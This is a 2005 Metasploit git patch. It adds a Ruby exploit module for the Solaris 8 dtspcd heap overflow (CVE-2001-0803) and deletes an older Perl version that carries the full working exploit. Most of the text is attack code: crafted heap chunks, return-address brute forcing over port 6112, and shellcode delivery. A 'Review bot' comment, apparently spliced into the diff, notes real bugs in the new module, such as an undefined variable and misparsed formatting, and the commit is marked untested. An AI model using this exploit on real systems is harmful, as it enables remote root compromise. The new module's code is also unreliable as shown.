From 87f23247a56b07d9494d863ccbf40dfd90ed5560 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Tue, 27 Dec 2005 05:47:03 +0000
Subject: [PATCH] Moved. Changed. Woop. Not tested
git-svn-id: file:///home/svn/incoming/trunk@3261 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/solaris/dtspcd/heap_noir.rb | 140 +++++++++
 .../solaris/dtspcd/solaris_dtspcd_noir.rb | 265 ------------------
 2 files changed, 140 insertions(+), 265 deletions(-)
 create mode 100644 modules/exploits/solaris/dtspcd/heap_noir.rb
 delete mode 100644 modules/exploits/solaris/dtspcd/solaris_dtspcd_noir.rb
diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb
new file mode 100644
index 0000000000..190cf3f96c
--- /dev/null
+++ b/modules/exploits/solaris/dtspcd/heap_noir.rb
@@ -0,0 +1,140 @@ +require 'msf/core' + +module Msf + +class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Solaris dtspcd Heap Overflow', + 'Description' => %q{ + This is a port of noir's dtspcd exploit. This module should + work against any vulnerable version of Solaris 8 (sparc). + The original exploit code was published in the book + Shellcoder's Handbook. + + }, + 'Author' => [ 'noir ', 'hdm' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '4503'], + [ 'CVE', '2001-0803'], + [ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'], + [ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'], + [ 'MIL', '61'], + + ], + 'Privileged' => true, + 'Payload' => + { + 'Space' => 800, + 'BadChars' => "\x00\x0d", + 'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3), + }, + 'Platform' => 'solaris', + 'Arch' => ARCH_SPARC, + 'Targets' => + [ + ['Solaris 8', + { 'Rets' => + [0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ] + } + ], + ], + 'DisclosureDate' => 'Jul 10 2002', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(6112) + ], self.class) + end + + + def exploit + return if not dtspcd_uname() + + target['Rets'][4].each do |tjmp| + + rbase = target['Rets'][1] + + while (rbase < target['Rets'][2]) do + print_status("Trying 0x%.8x 0x%.8x" % target['Rets'][0] + tjmp, rbase) + attack(target['Rets'][0] + tjmp, rbase, payload.encoded) + attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded) + rbase += target['Rets'][3] + end + end + + handler + disconnect + end + + def check + return Exploit::CheckCode::Detected if dtspcd_uname() + return Exploit::CheckCode::Safe + end + + def dtspcd_uname + spc_connect() + spc_write(spc_register('root', "\x00"), 4) + host, os, ver, arch = spc_read().gsub("\x00", '').split(':') + + return false if not host + + print_status("Detected 
dtspcd running #{os} v#{ver} on #{arch} hardware") + spc_write("", 2) + return true + end + + + def chunk_create(retloc, retadd) + "\x12\x12\x12\x12" + + [retaddr].pack('N')+ + "\x23\x23\x23\x23\xff\xff\xff\xff" + + "\x34\x34\x34\x34\x45\x45\x45\x45" + + "\x56\x56\x56\x56" + + [retloc - 8].pack('N') + end + + + def attack(retloc, retadd, fcode) + spc_connect() + + buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - fcode.length) / 8)) + fcode + buf << "\x00\x00\x10\x3e\x00\x00\x00\x14" + buf << "\x12\x12\x12\x12\xff\xff\xff\xff" + buf << "\x00\x00\x0f\xf4" + buf << chunk_create(retloc, retadd) + buf << "X" * ((0x103e - 8) - buf.length) + + spc_write(spc_register("", buf), 4) + sock.get_once(-1) + end + + + def spc_register(user='', buff='') + "4 \x00#{user}\x00\x0010\x00#{buff}" + end + + def spc_write(buff = '', cmd='') + sock.put(sprintf("%08x%02x%04x%04x %s", 2, cmd, buff.length, (@spc_seq += 1), buff)) + end + + def spc_read + # Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq + head = sock.get_once(20) + sock.get_once( head[10, 13].hex ) || '' + end + + def spc_connect + disconnect + connect + @spc_seq = 0 + end + +end +end diff --git a/modules/exploits/solaris/dtspcd/solaris_dtspcd_noir.rb b/modules/exploits/solaris/dtspcd/solaris_dtspcd_noir.rb deleted file mode 100644 index 43afbc762b..0000000000 --- a/modules/exploits/solaris/dtspcd/solaris_dtspcd_noir.rb +++ /dev/null 
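Review bot: `chunk_create` packs `retaddr`, a name that is never defined (the parameter is `retadd`), so the first call from `attack` raises NameError; the line should read `[retadd].pack('N')+`. In `exploit`, `"Trying 0x%.8x 0x%.8x" % target['Rets'][0] + tjmp` binds `%` before `+`, so the format is applied to a single argument and `rbase` is passed as a second argument to `print_status`; use `print_status("Trying 0x%.8x 0x%.8x" % [target['Rets'][0] + tjmp, rbase])`. In `spc_read`, `head[10, 13]` is a (start, length) slice that runs past the mbl field into the sequence number, contradicting both the comment above it and the four-character `%04x` length field that `spc_write` emits; `sock.get_once(head[10, 4].hex) || ''` matches both. `head` is also indexed without a nil check, so if `get_once` returns nil on a closed peer the method raises rather than returning the empty string its caller in `dtspcd_uname` expects.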
@@ -1,265 +0,0 @@ -require 'msf/core' - -module Msf - -class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote - - include Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Solaris dtspcd Heap Overflow', - 'Description' => %q{ - This is a port of noir's dtspcd exploit. This module should - work against any vulnerable version of Solaris 8 (sparc). - The original exploit code was published in the book - Shellcoder's Handbook. - - }, - 'Author' => [ 'noir ', 'hdm' ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'OSVDB', '4503'], - [ 'CVE', '2001-0803'], - [ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'], - [ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'], - [ 'MIL', '61'], - - ], - 'Privileged' => true, - 'Payload' => - { - 'Space' => 800, - 'BadChars' => "\x00\x0d", - 'PrependEncoder' => "\xa4\x1c\x40\x11\xa4\x1c\x40\x11\xa4\x1c\x40\x11", - - }, - 'Targets' => - [ - [ - 'Automatic Targetting', - { - 'Platform' => 'solaris', - 'Ret' => 0x0, - }, - ], - ], - 'DisclosureDate' => 'Jul 10 2002', - 'DefaultTarget' => 0)) - end - - def exploit - connect - - handler - disconnect - end - -=begin - -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. 
-## - -package Msf::Exploit::solaris_dtspcd_noir; -use base "Msf::Exploit"; -use IO::Socket; -use IO::Select; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'Solaris dtspcd Heap Overflow', - 'Version' => '$Revision$', - 'Authors' => - [ - 'noir ', - 'H D Moore ' - ], - - 'Arch' => [ 'sparc' ], - 'OS' => [ 'solaris' ], - 'Priv' => 1, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The dtogin service port', 6112], - }, - - 'Payload' => - { - 'Space' => 800, - 'BadChars' => "\x00\x0d", - 'PrependEncoder' => (pack('N', 0xa41c4011) x 3), - }, - - 'Description' => Pex::Text::Freeform(qq{ - This is a port of noir's dtspcd exploit. This module should work against - any vulnerable version of Solaris 8 (sparc). The original exploit code - was published in the book Shellcoder's Handbook. -}), - - 'Refs' => - [ - ['OSVDB', '4503'], - ['CVE', '2001-0803'], - ['URL', 'http://www.cert.org/advisories/CA-2001-31.html'], - ['URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'], - ['MIL', '61'], - ], - - 'Targets' => - [ - ['Solaris8', 0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ], - ], - - 'Keys' => ['dtspcd'], - - 'DisclosureDate' => 'Jul 10 2002', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Check { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - - if(! 
$self->get_uname) { - $self->PrintLine("[*] No response from the dtlogin service"); - return $self->CheckCode('Safe'); - } - - # XXX - probe service for crash - return $self->CheckCode('Detected'); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target_idx = $self->GetVar('TARGET'); - my $target = $self->Targets->[ $target_idx ]; - - if(! $self->get_uname) { - $self->PrintLine("[*] No response from the dtlogin service"); - return; - } - - my ($res, $req); - - for my $tjmp ( @{ $target->[5] } ) { - for (my $rbase = $target->[2]; $rbase < $target->[3]; $rbase += $target->[4] ) { - $self->PrintLine("[*] Trying ".sprintf("0x%.8x 0x%.8x", $target->[1] + $tjmp, $rbase)); - return if ! $self->attack($target->[1] + $tjmp, $rbase, $shellcode); - return if ! $self->attack($target->[1] + $tjmp, $rbase + 4, $shellcode); - } - } -} - -sub spc_setup { - my $self = shift; - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $self->GetVar('RHOST'), - 'PeerPort' => $self->GetVar('RPORT'), - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $self->{'SOC'} = $s; - return $s; -} - -sub spc_register { - my ($self, $user, $buff) = @_; - return "4 "."\x00".$user."\x00\x00"."10"."\x00".$buff; -} - -sub spc_write { - my ($self, $buff, $cmd) = @_; - my $req = sprintf("%08x%02x%04x%04x %s", 2, $cmd, length($buff), ++$self->{'SEQ'}, $buff); - return if ! $self->{'SOC'}; - return $self->{'SOC'}->Send($req); -} - -sub spc_read { - my $self = shift; - return if ! 
$self->{'SOC'}; - my $buff = $self->{'SOC'}->Recv(20, 5); - my $chan = hex(substr($buff, 0, 9)); - my $cmd = hex(substr($buff, 9, 1)); - my $mbl = hex(substr($buff, 10, 4)); - my $seq = hex(substr($buff, 14, 4)); - $buff = $self->{'SOC'}->Recv($mbl, 5); - return $buff; -} - -sub get_uname { - my $self = shift; - return if ! $self->spc_setup; - $self->spc_write($self->spc_register('root', "\x00"), 4); - my $buff = $self->spc_read; - $buff =~ s/\x00//g; - - my ($host, $os, $ver, $arch) = split(/:/, $buff); - return if ! $host; - - $self->PrintLine("[*] Detected dtspcd running $os v$ver on $arch hardware"); - $self->spc_write("", 2); -} - -sub get_chunk { - my ($self, $retloc, $retadd) = @_; - return - "\x12\x12\x12\x12" . pack('N', $retadd). - "\x23\x23\x23\x23\xff\xff\xff\xff". - "\x34\x34\x34\x34\x45\x45\x45\x45". - "\x56\x56\x56\x56" . pack('N', $retloc - 8); -} - -sub attack { - my ($self, $retloc, $retadd, $fcode) = @_; - return if ! $self->spc_setup; - - my $req = "\xa4\x1c\x40\x11\x20\xbf\xff\xff" x ((4096 - 8 - length($fcode)) / 8); - $req .= $fcode . - "\x00\x00\x10\x3e\x00\x00\x00\x14". - "\x12\x12\x12\x12\xff\xff\xff\xff". - "\x00\x00\x0f\xf4". - $self->get_chunk($retloc, $retadd); - - $req .= "A" x ((0x103e - 8) - length($req)); - - $self->spc_write($self->spc_register("", $req), 4); - my $res = $self->{'SOC'}->Recv(-1, 5); - return 1; -} - -1; - -=end - - -end -end